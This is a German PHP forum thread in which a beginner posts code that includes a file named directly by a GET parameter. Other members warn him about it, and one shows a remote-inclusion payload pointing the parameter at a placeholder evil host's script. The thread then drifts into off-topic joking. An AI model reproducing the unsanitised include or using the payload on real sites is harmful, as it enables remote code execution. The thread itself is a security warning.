php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > HTML, JavaScript, AJAX, jQuery, CSS, Bootstrap, LESS
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


HTML, JavaScript, AJAX, jQuery, CSS, Bootstrap, LESS Probleme mit HTML5, Bootstrap oder jQuery ?

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 24-09-2007, 21:55
phpMorpheus2
 Registrierter Benutzer
Links : Onlinestatus : phpMorpheus2 ist offline
Registriert seit: Apr 2007
Beiträge: 646
Blog-Einträge: 2
phpMorpheus2 ist zur Zeit noch ein unbeschriebenes Blatt
Standard $_GET direkt weiterleiten

Hallo,
habe folgenden Code:

PHP-Code:
<?php
include($_GET['content'].".php");
?>
content ist z.B. "news" dann soll included werden: "news.php"
Mit Zitat antworten
  #2 (permalink)  
Alt 24-09-2007, 22:11
phpMorpheus2
 Registrierter Benutzer
Links : Onlinestatus : phpMorpheus2 ist offline
Registriert seit: Apr 2007
Beiträge: 646
Blog-Einträge: 2
phpMorpheus2 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Wieso funktioniert das nicht?
Ist doch alles richtig eigentlich...
Mit Zitat antworten
  #3 (permalink)  
Alt 24-09-2007, 22:25
penizillin
 PHP Guru
Links : Onlinestatus : penizillin ist offline
Registriert seit: Feb 2004
Beiträge: 10.166
penizillin ist zur Zeit noch ein unbeschriebenes Blatt
Standard

und jetzt stell dir vor, die seite heißt index.php und ich rufe auf: "index.php?content=index"

nachher lernst du bitte http://de2.php.net/manual/en/security.filesystem.php auswendig, bevor du auch nur eine weitere zeile schreibst.
Mit Zitat antworten
  #4 (permalink)  
Alt 25-09-2007, 08:35
hhcm
 PHP Senior
Links : Onlinestatus : hhcm ist offline
Registriert seit: Jun 2005
Ort: Viersen, NRW
Beiträge: 1.833
hhcm ist zur Zeit noch ein unbeschriebenes Blatt
hhcm eine Nachricht über ICQ schicken hhcm eine Nachricht über Skype™ schicken
Standard

Zitat:
Original geschrieben von penizillin
und jetzt stell dir vor, die seite heißt index.php und ich rufe auf: "index.php?content=index"
Stell dir vor ich schreibe

?content=http://böserhost/bösesPhpscriptOhneEndung
__________________
gruss Chris

Derjenige, der sagt: "Es geht nicht", soll den nicht stoeren, der's gerade tut."
Mit Zitat antworten
  #5 (permalink)  
Alt 25-09-2007, 08:46
Wyveres
 Registrierter Benutzer
Links : Onlinestatus : Wyveres ist offline
Registriert seit: Dec 2006
Ort: Rügen
Beiträge: 763
Blog-Einträge: 2
Wyveres ist zur Zeit noch ein unbeschriebenes Blatt
Wyveres eine Nachricht über ICQ schicken
Standard

Zitat:
Original geschrieben von hhcm
Stell dir vor ich schreibe

?content=http://böserhost/bösesPhpscriptOhneEndung
und man stelle sich zusätzlich noch vor das in diesem Bösen PHP script nicht nur böses ist sondern auch gleich noch alles gelöscht wird.

x)

@topicstarter ...

die freundlichen menschen hier sagen dir ganz unverblühmt ... das da ist MIST x) GROSSER BOCKMISST!!!!
__________________
Bitte Beachten.
Foren-Regeln
Danke
Mit Zitat antworten
  #6 (permalink)  
Alt 25-09-2007, 12:50
arkos
 PHP Senior
Links : Onlinestatus : arkos ist offline
Registriert seit: Feb 2003
Ort: hamburg
Beiträge: 1.015
arkos ist zur Zeit noch ein unbeschriebenes Blatt
Standard Re: $_GET direkt weiterleiten

Zitat:
Original geschrieben von phpMorpheus2
Hallo,
habe folgenden Code:

PHP-Code:
<?php
include($_GET['content'].".php");
?>
content ist z.B. "news" dann soll included werden: "news.php"
und vor allem sehe ich da nicht den ansatz einer frage. da hättest du mir auch sagen könne, was es heut bei dir zum mittag gibt.
__________________
**********
arkos
**********
Mit Zitat antworten
  #7 (permalink)  
Alt 25-09-2007, 13:12
TobiaZ
  Moderator
Links : Onlinestatus : TobiaZ ist offline
Registriert seit: Jan 2001
Ort: MUC und MGL, Germany
Beiträge: 34.421
Blog-Einträge: 1
TobiaZ befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
und vor allem sehe ich da nicht den ansatz einer frage. da hättest du mir auch sagen könne, was es heut bei dir zum mittag gibt.
OffTopic:
Ich bitte dich, wir sind ein PHP Forum. Da hat Mittagessen nun wirklich nichts zu suchen. Aber ist doch toll, wenn er anderen Leuten seinen Code zeigen möchte. Nach einem Tag PHP-Programmieren ist include auch schon ne richtig tolle Sache...
__________________
ERST LESEN: Unsere Regeln. | Ich hab schon Pferde kotzen sehn!

READ THIS: Strings richtig trennen/verbinden | JOINs, das leidige Thema | Wegwerf E-Mail Adressen

Ich werde keinen privaten 1:1 Support leisten, außer ich biete ihn ausdrücklich an.

Wenn man sich selbst als "Noob" bezeichnet, sollte man die Finger davon lassen.
Wenn man gewillt ist daran etwas zu ändern, lernt man Grundlagen!
Mit Zitat antworten
  #8 (permalink)  
Alt 25-09-2007, 14:11
arkos
 PHP Senior
Links : Onlinestatus : arkos ist offline
Registriert seit: Feb 2003
Ort: hamburg
Beiträge: 1.015
arkos ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von TobiaZ
OffTopic:
... Aber ist doch toll, wenn er anderen Leuten seinen Code zeigen möchte. ...
OffTopic:

habs eben mal versucht. bin aufn flur gerannt und habe gerufen: "leute, kommt mal schnell, ich will euch meinen code zeigen"...
...
...
kam nicht so gut an...




__________________
**********
arkos
**********
Mit Zitat antworten
  #9 (permalink)  
Alt 25-09-2007, 14:13
TobiaZ
  Moderator
Links : Onlinestatus : TobiaZ ist offline
Registriert seit: Jan 2001
Ort: MUC und MGL, Germany
Beiträge: 34.421
Blog-Einträge: 1
TobiaZ befindet sich auf einem aufstrebenden Ast
Standard

OffTopic:
dafür gibts ja auch foren.
__________________
ERST LESEN: Unsere Regeln. | Ich hab schon Pferde kotzen sehn!

READ THIS: Strings richtig trennen/verbinden | JOINs, das leidige Thema | Wegwerf E-Mail Adressen

Ich werde keinen privaten 1:1 Support leisten, außer ich biete ihn ausdrücklich an.

Wenn man sich selbst als "Noob" bezeichnet, sollte man die Finger davon lassen.
Wenn man gewillt ist daran etwas zu ändern, lernt man Grundlagen!
Mit Zitat antworten
  #10 (permalink)  
Alt 25-09-2007, 14:16
arkos
 PHP Senior
Links : Onlinestatus : arkos ist offline
Registriert seit: Feb 2003
Ort: hamburg
Beiträge: 1.015
arkos ist zur Zeit noch ein unbeschriebenes Blatt
Standard

OffTopic:

echt?
ok, dann machts mal gut... war schön hier. ... hätt ich das früher gewusst




__________________
**********
arkos
**********
Mit Zitat antworten
  #11 (permalink)  
Alt 25-09-2007, 16:21
Wyveres
 Registrierter Benutzer
Links : Onlinestatus : Wyveres ist offline
Registriert seit: Dec 2006
Ort: Rügen
Beiträge: 763
Blog-Einträge: 2
Wyveres ist zur Zeit noch ein unbeschriebenes Blatt
Wyveres eine Nachricht über ICQ schicken
Standard

OffTopic:
So kann man seinen POST Count auch schön pflegen
__________________
Bitte Beachten.
Foren-Regeln
Danke
Mit Zitat antworten
  #12 (permalink)  
Alt 25-09-2007, 16:24
arkos
 PHP Senior
Links : Onlinestatus : arkos ist offline
Registriert seit: Feb 2003
Ort: hamburg
Beiträge: 1.015
arkos ist zur Zeit noch ein unbeschriebenes Blatt
Standard

OffTopic:

in vier jahren erst 550... da muss ich doch was tun

__________________
**********
arkos
**********
Mit Zitat antworten
  #13 (permalink)  
Alt 25-09-2007, 16:27
Wyveres
 Registrierter Benutzer
Links : Onlinestatus : Wyveres ist offline
Registriert seit: Dec 2006
Ort: Rügen
Beiträge: 763
Blog-Einträge: 2
Wyveres ist zur Zeit noch ein unbeschriebenes Blatt
Wyveres eine Nachricht über ICQ schicken
Standard

Zitat:
Original geschrieben von arkos
OffTopic:

in vier jahren erst 550... da muss ich doch was tun

OffTopic:
Haste eigentlich recht aber x) nur durch OT is doch auch nicht das wahre. stell dir vor in 5 jahren sucht ein neuling nach einem tip nach beiträgen von dir ... weil du in irgendeinem beitrag das für ihn wichtige gesagt hast. und der neuling findet nach tagelanger klick suche nur OT OT OT ... und weint dann im forum rum das er diesen beitrag von dir nicht finden kann ... ein herz für neulinge x)
__________________
Bitte Beachten.
Foren-Regeln
Danke
Mit Zitat antworten
  #14 (permalink)  
Alt 25-09-2007, 16:42
arkos
 PHP Senior
Links : Onlinestatus : arkos ist offline
Registriert seit: Feb 2003
Ort: hamburg
Beiträge: 1.015
arkos ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von Wyveres
OffTopic:
Haste eigentlich recht aber x) nur durch OT is doch auch nicht das wahre. stell dir vor in 5 jahren sucht ein neuling nach einem tip nach beiträgen von dir ... weil du in irgendeinem beitrag das für ihn wichtige gesagt hast. und der neuling findet nach tagelanger klick suche nur OT OT OT ... und weint dann im forum rum das er diesen beitrag von dir nicht finden kann ... ein herz für neulinge x)
OffTopic:

oh, gut... sehr gut. denn in 99% der fälle ist es leider so, dass die neulinge das suchen nicht beherrschen... wenn sie das dadurch also lernen, habe ich schon geholfen bevor ich einmal [ PHP ] geschrieben habe

__________________
**********
arkos
**********
Mit Zitat antworten
  #15 (permalink)  
Alt 25-09-2007, 16:51
Wyveres
 Registrierter Benutzer
Links : Onlinestatus : Wyveres ist offline
Registriert seit: Dec 2006
Ort: Rügen
Beiträge: 763
Blog-Einträge: 2
Wyveres ist zur Zeit noch ein unbeschriebenes Blatt
Wyveres eine Nachricht über ICQ schicken
Standard

Zitat:
Original geschrieben von arkos
OffTopic:

oh, gut... sehr gut. denn in 99% der fälle ist es leider so, dass die neulinge das suchen nicht beherrschen... wenn sie das dadurch also lernen, habe ich schon geholfen bevor ich einmal [ PHP ] geschrieben habe

OffTopic:
da fällt mir glat ein Tut ein x) Wie Nutze ich die PHP-Resource Suche Richtig x)

oder glad als Buch ... PHP-Resource for Dummys ...


__________________
Bitte Beachten.
Foren-Regeln
Danke
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 21:25 Uhr.